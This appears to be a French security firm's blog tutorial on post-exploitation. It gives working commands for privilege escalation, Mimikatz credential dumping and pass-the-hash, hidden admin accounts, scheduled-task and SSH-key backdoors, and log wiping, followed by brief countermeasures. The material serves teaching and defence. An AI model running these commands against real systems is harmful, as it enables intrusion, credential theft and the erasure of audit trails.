Facebook Pixel
Obtenir un devis

Post-Exploitation et Persistance : Techniques avancées après compromission

  • Home
  • Blog
  • Post-Exploitation et Persistance : Techniques avancées après compromission
Post-Exploitation et Persistance : Techniques avancées après compromission

1. Introduction à la post-exploitation

Une fois qu’un attaquant a obtenu un accès initial à une machine cible, l’objectif principal est d’élever les privilèges, collecter des informations sensibles, assurer une persistance durable et éviter la détection.

📌 Post-Exploitation – YUCELSAN
✔ Maximiser l’exploitation du système compromis.
✔ Maintenir un accès permanent (persistance).
✔ Récupérer des informations d’identification.
✔ Déployer d’autres charges utiles pour une attaque plus large.

👉 Outils clés : Metasploit, Mimikatz, BloodHound, Empire, Cobalt Strike, Sliver.

2. Élévation de privilèges (Privilege Escalation)

L’élévation de privilèges consiste à exploiter des failles ou des configurations faibles pour obtenir des droits administrateur/root sur un système.

📌 Techniques courantes :

  • Exploitation de vulnérabilités Kernel : DirtyPipe, DirtyCow, PrintNightmare.
  • Droits mal configurés : Permissions excessives sur des fichiers sensibles.
  • Mots de passe en clair : Stockés dans des fichiers, registres, etc.

2.1. Escalade de privilèges sur Windows avec Metasploit

1
2
3
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
exploit

Exploite la vulnérabilité MS16-032 pour obtenir SYSTEM.

2.2. Exploitation de Sudo sur Linux

📌 Vérifier les permissions sudo :

1
sudo -l

📌 Exploiter une configuration incorrecte :

1
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

3. Récupération des identifiants (Credential Dumping)

L’objectif est de récupérer les mots de passe et tokens d’authentification stockés sur la machine compromise.

3.1. Extraction des credentials Windows avec Mimikatz

📌 Lancer Mimikatz et récupérer les mots de passe en RAM :

1
2
3
mimikatz
privilege::debug
sekurlsa::logonpasswords

Affiche les identifiants stockés en mémoire (NTLM, Kerberos, mots de passe en clair).

📌 Dump du SAM pour extraire les mots de passe locaux

1
2
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save

Puis cracker les hashes avec John The Ripper :

1
john --format=NT --wordlist=rockyou.txt sam.hash

3.2. Extraction de tokens d’accès Windows avec Rubeus

1
Rubeus.exe dump

👉 Permet de récupérer des tokens d’authentification Kerberos.

4. Maintien de l’accès (Persistance avancée)

Une fois les privilèges élevés et les identifiants récupérés, l’attaquant doit s’assurer de maintenir l’accès au système même après un redémarrage.

📌 Méthodes courantes :
✅ Création d’un compte administrateur caché.
✅ Implémentation de backdoors persistantes via services, DLL hijacking.
✅ Ajout d’une clé dans le registre Windows (Run, RunOnce, Task Scheduler).
✅ Modification des autorisations SSH sur Linux.

4.1. Ajout d’un utilisateur persistant sur Windows

1
2
net user hacker P@ssw0rd123 /add
net localgroup Administrators hacker /add

Ajoute un nouvel administrateur système.

4.2. Persistance avec Scheduled Tasks

1
schtasks /create /tn "Windows Update" /tr "C:\backdoor.exe" /sc ONSTART /ru SYSTEM

Exécute un fichier malveillant au démarrage du système.

4.3. Backdoor SSH persistante sur Linux

📌 Ajouter une clé SSH malveillante :

1
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQE..." >> ~/.ssh/authorized_keys

Permet à l’attaquant de se reconnecter sans mot de passe.

5. Mouvement latéral et pivoting

Une fois l’accès obtenu, l’attaquant peut tenter de se déplacer latéralement sur le réseau pour compromettre d’autres machines.

📌 Techniques :
✅ Utilisation de credentials volés (Pass-the-Hash, Pass-the-Ticket).
✅ Exploitation de partages SMB ouverts.
✅ Escalade sur Active Directory avec BloodHound.

5.1. Pass-the-Hash avec Mimikatz

1
2
mimikatz
sekurlsa::pth /user:Admin /domain:Corp.local /ntlm:<hash>

Connexion en utilisant un hash NTLM volé.

5.2. Cartographie d’Active Directory avec BloodHound

1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp\

Affiche les relations et privilèges des utilisateurs AD.

6. Évasion et dissimulation (Rootkits, Obfuscation, Anti-forensic)

L’attaquant va chercher à cacher ses traces et éviter la détection par les solutions EDR/SIEM.

📌 Techniques :
Rootkits : Modification du noyau pour masquer les processus malveillants.
Obfuscation de scripts : Encodage PowerShell (Base64, AMSI Bypass).
Désactivation des logs Windows :

1
wevtutil cl Security

Suppression des logs SSH/Linux :

1
cat /dev/null > /var/log/auth.log

7. Contre-mesures et remédiation

🔐 Meilleures pratiques pour contrer la post-exploitation :
Audit des logs et surveillance des événements (SIEM, Splunk, ELK).
Restriction des privilèges administrateurs et suppression des comptes inutiles.
Mise en place de solutions EDR avancées (CrowdStrike, SentinelOne).
Désactivation de NTLM et de SMBv1 pour limiter Pass-the-Hash.
Rotation régulière des mots de passe et implémentation du MFA.

8. Conclusion

La post-exploitation et la persistance sont des étapes critiques dans une attaque avancée. Elles permettent aux attaquants de maintenir un accès prolongé aux systèmes et de maximiser leur impact. Les défenseurs doivent donc adopter une approche proactive pour détecter et bloquer ces techniques.

🚀 Besoin d’un audit de sécurité ou d’un test de pénétration avancé ? YUCELSAN vous accompagne pour renforcer votre cybersécurité.

📞 Contactez-nous pour une évaluation et une remédiation complète !

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Copyright YUCELSAN FR. All Rights Reserved.